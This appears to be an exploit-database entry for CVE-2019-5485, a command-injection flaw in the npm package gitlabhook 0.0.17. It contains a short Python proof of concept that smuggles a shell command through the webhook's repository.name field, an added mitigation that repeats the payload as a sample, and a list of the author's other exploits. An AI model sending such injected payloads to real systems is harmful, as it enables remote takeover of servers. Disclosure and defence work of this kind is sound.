"NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution"

Author: "Semen Alexandrovich Lyhin"

Platform: json

Release date: 2019-09-25

# Exploit Title: NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution
# Date: 2019-09-13
# Exploit Author: Semen Alexandrovich Lyhin
# Vendor Homepage: https://www.npmjs.com/package/gitlabhook
# Version: 0.0.17
# Tested on: Kali Linux 2, Windows 10. 
# CVE : CVE-2019-5485

#!/usr/bin/python

import requests

target = "http://TARGET:3420"
cmd = r"touch /tmp/poc.txt"
json = '{"repository":{"name": "Diasporrra\'; %s;\'"}}'% cmd
r = requests.post(target, json)

print "Done."
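
A receiver-side mitigation for the injection this PoC demonstrates, as an added example (not code from the original page or from the gitlabhook project): it validates `repository.name` against an allowlist and hands it to the hook program as a single argv element instead of interpolating it into a shell string. The function names, the allowlist pattern and the sample bodies are assumptions constructed for illustration.

```javascript
// Added defensive example; function names and the allowlist are assumptions,
// not gitlabhook's own API.
const { execFileSync } = require('child_process');

// Conservative allowlist: starts with an alphanumeric (so it can never look
// like a command-line option), then letters, digits, '.', '_' or '-'.
const SAFE_REPO_NAME = /^[A-Za-z0-9][A-Za-z0-9._-]{0,99}$/;

// Parse a webhook body and return repository.name only if it is safe;
// return null for malformed JSON, missing fields or rejected names.
function repoNameFromWebhook(body) {
  let payload;
  try {
    payload = JSON.parse(body);
  } catch (err) {
    return null;
  }
  const name = payload && payload.repository && payload.repository.name;
  if (typeof name !== 'string' || !SAFE_REPO_NAME.test(name)) return null;
  return name;
}

// Run the hook program without a shell. The name is passed as one argv
// element, so quotes and ';' in it are data, not shell syntax.
function runHook(program, fixedArgs, name) {
  return execFileSync(program, [...fixedArgs, name], { encoding: 'utf8' });
}

// Constructed sample bodies: one benign, one shaped like the payload above.
const BENIGN_BODY = JSON.stringify({ repository: { name: 'Diaspora' } });
const HOSTILE_BODY = JSON.stringify({
  repository: { name: "Diasporrra'; touch /tmp/poc.txt;'" },
});
```

Reject the request (for example with HTTP 400) when `repoNameFromWebhook` returns null, and log the rejected body so that probing of the hook endpoint is visible.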

| Release Date | Title | Type | Platform | Author |
|---|---|---|---|---|
| 2019-10-01 | "DotNetNuke 9.3.2 - Cross-Site Scripting" | webapps | multiple | "Semen Alexandrovich Lyhin" |
| 2019-09-26 | "inoERP 4.15 - 'download' SQL Injection" | webapps | php | "Semen Alexandrovich Lyhin" |
| 2019-09-25 | "NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution" | webapps | json | "Semen Alexandrovich Lyhin" |
| 2019-06-20 | "WebERP 4.15 - SQL injection" | webapps | php | "Semen Alexandrovich Lyhin" |
| 2019-04-10 | "D-Link DI-524 V2.06RU - Multiple Cross-Site Scripting" | webapps | hardware | "Semen Alexandrovich Lyhin" |
| 2018-11-13 | "XAMPP Control Panel 3.2.2 - Buffer Overflow (SEH) (Unicode)" | local | windows | "Semen Alexandrovich Lyhin" |
| 2018-11-06 | "Arm Whois 3.11 - Buffer Overflow (SEH)" | local | windows_x86 | "Semen Alexandrovich Lyhin" |